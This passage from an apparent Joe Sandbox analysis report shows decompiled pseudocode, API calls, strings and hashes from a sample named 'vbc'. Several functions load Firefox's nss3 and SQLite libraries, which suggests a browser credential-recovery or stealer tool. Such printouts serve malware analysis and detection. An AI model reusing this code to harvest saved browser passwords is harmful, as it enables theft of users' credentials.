						_t71 = _t71 + 0xc;
						_a44 =  &_a56;
						_a8.cbSize = 0x30;
						_a12 = 0x36;
						_a48 = 0x1000;
						_a56 = 0;
						if(GetMenuItemInfoA(_a8.cbSize, _v4, 1,  &_a8) == 0) {
							goto L14;
						}
						if(_a56 == 0) {
							L12:
							_t80 = _a28;
							if(_a28 != 0) {
								_push(0);
								_push(_a28);
								_push(_a4);
								E00407A64(_t59, _t80);
								_t71 = _t71 + 0xc;
							}
							goto L14;
						}
						_t64 = _a24;
						_a4160 = 0;
						memset( &_a4161, 0, 0x1000);
						_t49 = strchr( &_a56, 9);
						_t71 = _t71 + 0x14;
						_v0 = _t49;
						if(_a28 != 0) {
							if(_a12 == 0) {
								 *0x4171b4 =  *0x4171b4 + 1;
								_t64 =  *0x4171b4 + 0x11558;
								__eflags = _t64;
							} else {
								_t64 = _v4 + 0x11171;
							}
						}
						_t51 = E00407D89(_t64,  &_a4160);
						_pop(_t59);
						if(_t51 != 0) {
							if(_v0 != 0) {
								strcat( &_a4160, _v0);
								_pop(_t59);
							}
							ModifyMenuA(_a8, _v4, 0x400, _t64,  &_a4160);
						}
						goto L12;
						L14:
						_v4 = _v4 + 1;
						_t39 = _v4;
					} while (_t39 < _a4);
					goto L15;
				}
			}











                                                                                                                                                    0x00407a64
                                                                                                                                                    0x00407a67
                                                                                                                                                    0x00407a6f
                                                                                                                                                    0x00407a7a
                                                                                                                                                    0x00407a84
                                                                                                                                                    0x00407a88
                                                                                                                                                    0x00407a8c
                                                                                                                                                    0x00407bb2
                                                                                                                                                    0x00407bb8
                                                                                                                                                    0x00407a92
                                                                                                                                                    0x00407a97
                                                                                                                                                    0x00407a9e
                                                                                                                                                    0x00407aa3
                                                                                                                                                    0x00407aaa
                                                                                                                                                    0x00407ab9
                                                                                                                                                    0x00407ac4
                                                                                                                                                    0x00407acc
                                                                                                                                                    0x00407ad0
                                                                                                                                                    0x00407adc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00407ae6
                                                                                                                                                    0x00407b8a
                                                                                                                                                    0x00407b8a
                                                                                                                                                    0x00407b8e
                                                                                                                                                    0x00407b90
                                                                                                                                                    0x00407b91
                                                                                                                                                    0x00407b95
                                                                                                                                                    0x00407b98
                                                                                                                                                    0x00407b9d
                                                                                                                                                    0x00407b9d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00407b8e
                                                                                                                                                    0x00407aec
                                                                                                                                                    0x00407afa
                                                                                                                                                    0x00407b01
                                                                                                                                                    0x00407b0d
                                                                                                                                                    0x00407b12
                                                                                                                                                    0x00407b19
                                                                                                                                                    0x00407b1d
                                                                                                                                                    0x00407b22
                                                                                                                                                    0x00407b30
                                                                                                                                                    0x00407b3c
                                                                                                                                                    0x00407b3c
                                                                                                                                                    0x00407b24
                                                                                                                                                    0x00407b28
                                                                                                                                                    0x00407b28
                                                                                                                                                    0x00407b22
                                                                                                                                                    0x00407b4b
                                                                                                                                                    0x00407b53
                                                                                                                                                    0x00407b54
                                                                                                                                                    0x00407b5a
                                                                                                                                                    0x00407b68
                                                                                                                                                    0x00407b6e
                                                                                                                                                    0x00407b6e
                                                                                                                                                    0x00407b84
                                                                                                                                                    0x00407b84
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00407ba0
                                                                                                                                                    0x00407ba0
                                                                                                                                                    0x00407ba4
                                                                                                                                                    0x00407ba8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00407a97

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$Itemmemset$CountInfoModifystrcatstrchr
                                                                                                                                                    • String ID: 0$6
                                                                                                                                                    • API String ID: 1757351179-3849865405
                                                                                                                                                    • Opcode ID: 0312b36b69dc19ec32793f3e1a4e0bacee62623ae2581f679c82ae12aac676fd
                                                                                                                                                    • Instruction ID: 1677788af10e21d8d50b2ad3b046da146c202dfcbfc60db105475917acddfa9f
                                                                                                                                                    • Opcode Fuzzy Hash: 0312b36b69dc19ec32793f3e1a4e0bacee62623ae2581f679c82ae12aac676fd
                                                                                                                                                    • Instruction Fuzzy Hash: 1A316D71808385AFD7109F55D84099BBBF9EB84358F14883FFA9492250D378EA44CF6B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040E988 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 64COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9A5
                                                                                                                                                    • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9B9
                                                                                                                                                    • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040E9C6
                                                                                                                                                    • memcpy.MSVCRT ref: 0040EA04
                                                                                                                                                    • CoTaskMemFree.OLE32(00000000,00000000), ref: 0040EA13
                                                                                                                                                    Strings
                                                                                                                                                    • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9B4
                                                                                                                                                    • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9AD
                                                                                                                                                    • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0040E9C1
                                                                                                                                                    • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9A0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                    • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                                    • API String ID: 1640410171-2022683286
                                                                                                                                                    • Opcode ID: 1c07360da451655baf40f8404e5edb4d1d178eda86dac3c95faae550bb755c51
                                                                                                                                                    • Instruction ID: a0dda8305716182b94471eb279f6daf9a8f1529c8f3e89cbb35285eb134eabf6
                                                                                                                                                    • Opcode Fuzzy Hash: 1c07360da451655baf40f8404e5edb4d1d178eda86dac3c95faae550bb755c51
                                                                                                                                                    • Instruction Fuzzy Hash: 3811607251412DAACB11EEA5DD40EEB37ECAB48354F044837FD12F3241F674E9248BA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00404837 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E00404837(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryA("comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxA(_t6, "Error: Cannot load the common control classes.", "Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}










                                                                                                                                                    0x00404844
                                                                                                                                                    0x0040484b
                                                                                                                                                    0x00404852
                                                                                                                                                    0x00404854
                                                                                                                                                    0x0040485c
                                                                                                                                                    0x00404860
                                                                                                                                                    0x0040488a
                                                                                                                                                    0x0040488a
                                                                                                                                                    0x00404892
                                                                                                                                                    0x00404893
                                                                                                                                                    0x00404898
                                                                                                                                                    0x004048b5
                                                                                                                                                    0x0040489a
                                                                                                                                                    0x004048a7
                                                                                                                                                    0x004048b0
                                                                                                                                                    0x004048b0
                                                                                                                                                    0x00404898
                                                                                                                                                    0x00404868
                                                                                                                                                    0x00404870
                                                                                                                                                    0x00404876
                                                                                                                                                    0x00404879
                                                                                                                                                    0x00404879
                                                                                                                                                    0x0040487c
                                                                                                                                                    0x00404884
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404886
                                                                                                                                                    0x00404886
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404886

                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(comctl32.dll,75144DE0,?,00000000,?,?,?,0040B9C9,75144DE0), ref: 00404856
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404868
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040B9C9,75144DE0), ref: 0040487C
                                                                                                                                                    • #17.COMCTL32(?,00000000,?,?,?,0040B9C9,75144DE0), ref: 0040488A
                                                                                                                                                    • MessageBoxA.USER32 ref: 004048A7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                    • API String ID: 2780580303-317687271
                                                                                                                                                    • Opcode ID: d22177ebd0c61848c13c07c1ee885c4d1d7d21c72c3c38fe6be86b3f4f770b99
                                                                                                                                                    • Instruction ID: 848b23aeb75660b77c3c697252adc3032e5e70f3caa3a854567a53d2e3e71345
                                                                                                                                                    • Opcode Fuzzy Hash: d22177ebd0c61848c13c07c1ee885c4d1d7d21c72c3c38fe6be86b3f4f770b99
                                                                                                                                                    • Instruction Fuzzy Hash: 3E0126723102017FD7156BA08D48BAF7AACEB84749F008139F602E21C0EBF8C912D6AC
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004081B5 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 42stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                    			E004081B5(void* __eflags, char* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E0040614B(_a4);
				if(_t3 != 0) {
					strcpy(0x4171b8, _a4);
					strcpy(0x4172c0, "general");
					_t6 = GetPrivateProfileIntA(0x4172c0, "rtl", 0, 0x4171b8);
					asm("sbb eax, eax");
					 *0x417304 =  ~(_t6 - 1) + 1;
					E00407DC1(0x417308, "charset", 0x3f);
					E00407DC1(0x417348, "TranslatorName", 0x3f);
					return E00407DC1(0x417388, "TranslatorURL", 0xff);
				}
				return _t3;
			}






                                                                                                                                                    0x004081b9
                                                                                                                                                    0x004081c1
                                                                                                                                                    0x004081cf
                                                                                                                                                    0x004081df
                                                                                                                                                    0x004081f0
                                                                                                                                                    0x004081f9
                                                                                                                                                    0x00408208
                                                                                                                                                    0x0040820d
                                                                                                                                                    0x0040821e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040823b
                                                                                                                                                    0x0040823c

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040614B: GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                                                                                                                    • strcpy.MSVCRT(004171B8,00000000,00000000,00000000,00408274,00000000,?,00000000,00000104,?), ref: 004081CF
                                                                                                                                                    • strcpy.MSVCRT(004172C0,general,004171B8,00000000,00000000,00000000,00408274,00000000,?,00000000,00000104,?), ref: 004081DF
                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32 ref: 004081F0
                                                                                                                                                      • Part of subcall function 00407DC1: GetPrivateProfileStringA.KERNEL32(004172C0,?,00412466,00417308,?,004171B8), ref: 00407DDC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PrivateProfilestrcpy$AttributesFileString
                                                                                                                                                    • String ID: HsA$TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                    • API String ID: 185930432-2094606381
                                                                                                                                                    • Opcode ID: 61c3254355be24366bef669af6bb7bd6cca1bcece2790ae3e2dc5a409b7b51f7
                                                                                                                                                    • Instruction ID: cb939eedfd3a0989361dc9c28bcf1dbf68e7932df9513b818d47ffc3c6ffa7d5
                                                                                                                                                    • Opcode Fuzzy Hash: 61c3254355be24366bef669af6bb7bd6cca1bcece2790ae3e2dc5a409b7b51f7
                                                                                                                                                    • Instruction Fuzzy Hash: 07F0F631ED821532DB113A622C03FEA39248FA2B16F04407FBC04B72C3DA7C4A81929E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040DEA9 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 32COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040DEA9() {
				int _t3;
				struct HINSTANCE__* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__* _t9;

				_t6 = GetModuleHandleA("nss3.dll");
				_t5 = GetModuleHandleA("sqlite3.dll");
				_t3 = GetModuleHandleA("mozsqlite3.dll");
				_t9 = _t3;
				if(_t6 != 0) {
					_t3 = FreeLibrary(_t6);
				}
				if(_t5 != 0) {
					_t3 = FreeLibrary(_t5);
				}
				if(_t9 != 0) {
					return FreeLibrary(_t9);
				}
				return _t3;
			}







                                                                                                                                                    0x0040debf
                                                                                                                                                    0x0040dec8
                                                                                                                                                    0x0040deca
                                                                                                                                                    0x0040ded4
                                                                                                                                                    0x0040ded6
                                                                                                                                                    0x0040ded9
                                                                                                                                                    0x0040ded9
                                                                                                                                                    0x0040dedd
                                                                                                                                                    0x0040dee0
                                                                                                                                                    0x0040dee0
                                                                                                                                                    0x0040dee4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040dee7
                                                                                                                                                    0x0040deed

                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleA.KERNEL32(nss3.dll,751457D0,?,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEB8
                                                                                                                                                    • GetModuleHandleA.KERNEL32(sqlite3.dll,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEC1
                                                                                                                                                    • GetModuleHandleA.KERNEL32(mozsqlite3.dll,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DECA
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DED9
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEE0
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEE7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeHandleLibraryModule
                                                                                                                                                    • String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
                                                                                                                                                    • API String ID: 662261464-3550686275
                                                                                                                                                    • Opcode ID: 86c3fc2903f606d4177665fb0a5e8ba99052a5cd3e374b4e3edda1da98f7fed5
                                                                                                                                                    • Instruction ID: d16a25c46baa9326af0e84a0bffbb5276bbaca378281f61e1b061e0aef5cb77a
                                                                                                                                                    • Opcode Fuzzy Hash: 86c3fc2903f606d4177665fb0a5e8ba99052a5cd3e374b4e3edda1da98f7fed5
                                                                                                                                                    • Instruction Fuzzy Hash: 72E0DF62F4132D67892066F19E84DABBE5CC895AE13150033AA00F3240DDE89C058AF8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040E172 Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                    			E0040E172(char* __edi, char* __esi) {
				void _v267;
				char _v268;
				char* _t15;
				void* _t38;
				char* _t48;

				_t49 = __esi;
				_t48 = __edi;
				if(__esi[1] != 0x3a) {
					_t15 = strchr( &(__esi[2]), 0x3a);
					if(_t15 == 0) {
						_t38 = E004069D2(0, "\\systemroot");
						if(_t38 < 0) {
							if( *__esi != 0x5c) {
								strcpy(__edi, __esi);
							} else {
								_v268 = 0;
								memset( &_v267, 0, 0x104);
								E00406325( &_v268);
								memcpy(__edi,  &_v268, 2);
								__edi[2] = 0;
								strcat(__edi, __esi);
							}
						} else {
							_v268 = 0;
							memset( &_v267, 0, 0x104);
							E00406325( &_v268);
							strcpy(__edi,  &_v268);
							_t8 =  &(_t49[0xb]); // 0xb
							strcat(__edi, _t38 + _t8);
						}
						L11:
						return _t48;
					}
					_push(_t15 - 1);
					L4:
					strcpy(_t48, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}








                                                                                                                                                    0x0040e172
                                                                                                                                                    0x0040e172
                                                                                                                                                    0x0040e17f
                                                                                                                                                    0x0040e18a
                                                                                                                                                    0x0040e193
                                                                                                                                                    0x0040e1b3
                                                                                                                                                    0x0040e1b8
                                                                                                                                                    0x0040e200
                                                                                                                                                    0x0040e249
                                                                                                                                                    0x0040e202
                                                                                                                                                    0x0040e210
                                                                                                                                                    0x0040e217
                                                                                                                                                    0x0040e223
                                                                                                                                                    0x0040e232
                                                                                                                                                    0x0040e239
                                                                                                                                                    0x0040e23d
                                                                                                                                                    0x0040e242
                                                                                                                                                    0x0040e1ba
                                                                                                                                                    0x0040e1c8
                                                                                                                                                    0x0040e1cf
                                                                                                                                                    0x0040e1db
                                                                                                                                                    0x0040e1e8
                                                                                                                                                    0x0040e1ed
                                                                                                                                                    0x0040e1f3
                                                                                                                                                    0x0040e1f8
                                                                                                                                                    0x0040e251
                                                                                                                                                    0x0040e254
                                                                                                                                                    0x0040e254
                                                                                                                                                    0x0040e196
                                                                                                                                                    0x0040e197
                                                                                                                                                    0x0040e198
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040e19e
                                                                                                                                                    0x0040e181
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • strchr.MSVCRT ref: 0040E18A
                                                                                                                                                    • strcpy.MSVCRT(?,-00000001), ref: 0040E198
                                                                                                                                                      • Part of subcall function 004069D2: strlen.MSVCRT ref: 004069E4
                                                                                                                                                      • Part of subcall function 004069D2: strlen.MSVCRT ref: 004069EC
                                                                                                                                                      • Part of subcall function 004069D2: _memicmp.MSVCRT ref: 00406A0A
                                                                                                                                                    • strcpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E1E8
                                                                                                                                                    • strcat.MSVCRT(?,0000000B,?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E1F3
                                                                                                                                                    • memset.MSVCRT ref: 0040E1CF
                                                                                                                                                      • Part of subcall function 00406325: GetWindowsDirectoryA.KERNEL32(00417550,00000104,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040633A
                                                                                                                                                      • Part of subcall function 00406325: strcpy.MSVCRT(00000000,00417550,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040634A
                                                                                                                                                    • memset.MSVCRT ref: 0040E217
                                                                                                                                                    • memcpy.MSVCRT ref: 0040E232
                                                                                                                                                    • strcat.MSVCRT(?,?,?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0040E23D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: strcpy$memsetstrcatstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                    • String ID: \systemroot
                                                                                                                                                    • API String ID: 1680921474-1821301763
                                                                                                                                                    • Opcode ID: 5187f8535ecd07f80173756fca004a5de43faed2157158ac4ad04829d081b859
                                                                                                                                                    • Instruction ID: c94fb6c7bd1247ab7199cb5b48e8c216c8115a4167fd8e2fb1b5c3c0fa66e4da
                                                                                                                                                    • Opcode Fuzzy Hash: 5187f8535ecd07f80173756fca004a5de43faed2157158ac4ad04829d081b859
                                                                                                                                                    • Instruction Fuzzy Hash: 7021F97554C20879E720A3635C82FEA77DC9F55348F5008AFF6CAA10C1EABC96D5862A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00405BE4 Relevance: 15.1, APIs: 10, Instructions: 63windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 67%
                                                                                                                                                    			E00405BE4(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi) {
				void* __esi;
				intOrPtr* _t27;
				void* _t30;
				struct HWND__* _t32;
				void* _t35;
				intOrPtr* _t36;

				_t30 = __edx;
				_t27 = __ecx;
				_push(__ebx);
				_push(__edi);
				_t32 =  *(__ecx + 4);
				_t35 = __ecx + 0xc;
				 *(_t35 + 0x10) = _t32;
				GetClientRect(_t32, _t35 + 0xa14);
				 *(_t35 + 0xa24) =  *(_t35 + 0xa24) & 0x00000000;
				GetWindow(GetWindow(_t32, 5), 0);
				do {
					__eax = E00401657(__edi, __esi);
					__edi = GetWindow(__edi, 2);
				} while (__edi != 0);
				__esi = GetDlgItem;
				__edi = 0x3ed;
				GetDlgItem( *(__ebx + 4), 0x3ed) = E0040F037(__eax);
				 *__esp = 0x3ee;
				GetDlgItem(??, ??) = E0040F037(__eax);
				 *__esp = 0x3ef;
				GetDlgItem( *(__ebx + 4),  *(__ebx + 4)) = E0040F037(__eax);
				 *__esp = 0x3f4;
				GetDlgItem( *(__ebx + 4), ??) = E0040F037(__eax);
				__eax =  *(__ebx + 4);
				GetDlgItem( *(__ebx + 4), 0x3ed) = SetFocus(__eax);
				_pop(__edi);
				_pop(__esi);
				__ecx = __ebx;
				_pop(__ebx);
				_t36 = _t27;
				 *((intOrPtr*)( *_t36 + 4))(1, _t35);
				 *((intOrPtr*)( *_t36 + 0x18))();
				E00406491(_t30,  *((intOrPtr*)(_t36 + 4)));
				return 0;
			}









                                                                                                                                                    0x00405be4
                                                                                                                                                    0x00405be4
                                                                                                                                                    0x00405be4
                                                                                                                                                    0x00405be9
                                                                                                                                                    0x00405bea
                                                                                                                                                    0x00405bed
                                                                                                                                                    0x00405bf8
                                                                                                                                                    0x00405bfb
                                                                                                                                                    0x00405c07
                                                                                                                                                    0x00405c16
                                                                                                                                                    0x00405c1a
                                                                                                                                                    0x00405c1a
                                                                                                                                                    0x00405c24
                                                                                                                                                    0x00405c26
                                                                                                                                                    0x00405c2a
                                                                                                                                                    0x00405c30
                                                                                                                                                    0x00405c3c
                                                                                                                                                    0x00405c41
                                                                                                                                                    0x00405c4e
                                                                                                                                                    0x00405c53
                                                                                                                                                    0x00405c60
                                                                                                                                                    0x00405c65
                                                                                                                                                    0x00405c72
                                                                                                                                                    0x00405c77
                                                                                                                                                    0x00405c80
                                                                                                                                                    0x00405c86
                                                                                                                                                    0x00405c87
                                                                                                                                                    0x00405c89
                                                                                                                                                    0x00405c8b
                                                                                                                                                    0x0040163a
                                                                                                                                                    0x00401640
                                                                                                                                                    0x00401647
                                                                                                                                                    0x0040164d
                                                                                                                                                    0x00401656

                                                                                                                                                    APIs
                                                                                                                                                    • GetClientRect.USER32 ref: 00405BFB
                                                                                                                                                    • GetWindow.USER32(?,00000005), ref: 00405C13
                                                                                                                                                    • GetWindow.USER32(00000000), ref: 00405C16
                                                                                                                                                      • Part of subcall function 00401657: GetWindowRect.USER32 ref: 00401666
                                                                                                                                                      • Part of subcall function 00401657: MapWindowPoints.USER32 ref: 00401681
                                                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 00405C22
                                                                                                                                                    • GetDlgItem.USER32 ref: 00405C39
                                                                                                                                                    • GetDlgItem.USER32 ref: 00405C4B
                                                                                                                                                    • GetDlgItem.USER32 ref: 00405C5D
                                                                                                                                                    • GetDlgItem.USER32 ref: 00405C6F
                                                                                                                                                    • GetDlgItem.USER32 ref: 00405C7D
                                                                                                                                                    • SetFocus.USER32(00000000), ref: 00405C80
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemWindow$Rect$ClientFocusPoints
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2187283481-0
                                                                                                                                                    • Opcode ID: d2f13065a0daf7b94e2d6602c1ebad63a970ca7fe2c26cba6661fff7476f23c3
                                                                                                                                                    • Instruction ID: 7666b00b3ddace13e8d54cd994e266c410995bf231072ec337e33f1596805ccb
                                                                                                                                                    • Opcode Fuzzy Hash: d2f13065a0daf7b94e2d6602c1ebad63a970ca7fe2c26cba6661fff7476f23c3
                                                                                                                                                    • Instruction Fuzzy Hash: 1A115471500304ABDB116F25CD49E6BBFADDF41758F05843AF544AB591CB79D8028A68
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00401A50 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                    			E00401A50(char* __edi, int __fp0) {
				void* _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				int _v28;
				int _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				void* _v60;
				char _v64;
				int _t79;
				intOrPtr _t80;
				int _t81;
				signed int _t94;
				int _t98;
				int _t100;
				void* _t104;
				void* _t106;
				intOrPtr _t115;
				char _t117;
				char* _t118;
				void* _t119;
				void* _t120;
				int _t122;
				signed int _t123;
				int* _t125;
				int _t159;
				int _t165;

				_t159 = __fp0;
				_t118 = __edi;
				_t125 = (_t123 & 0xfffffff8) - 0x40;
				_t79 = strlen(__edi);
				asm("fldz");
				_t104 = 0;
				_v28 = __fp0;
				_t120 = 0;
				_t106 = _t119;
				_v36 = _t79;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v44 = 0;
				_v60 = 0;
				_v40 = 0;
				_v12 = 0x20;
				_v20 = 0;
				_v8 = 0;
				_v16 = 0;
				if(_t79 > 0) {
					do {
						_t117 =  *((intOrPtr*)(_t120 + _t118));
						_v64 = _t117;
						if(_t117 - 0x41 <= 0x19) {
							_v56 = _v56 + 1;
						}
						if(_t117 - 0x61 <= 0x19) {
							_v52 = _v52 + 1;
						}
						if(_t117 - 0x30 <= 9) {
							_v48 = _v48 + 1;
						}
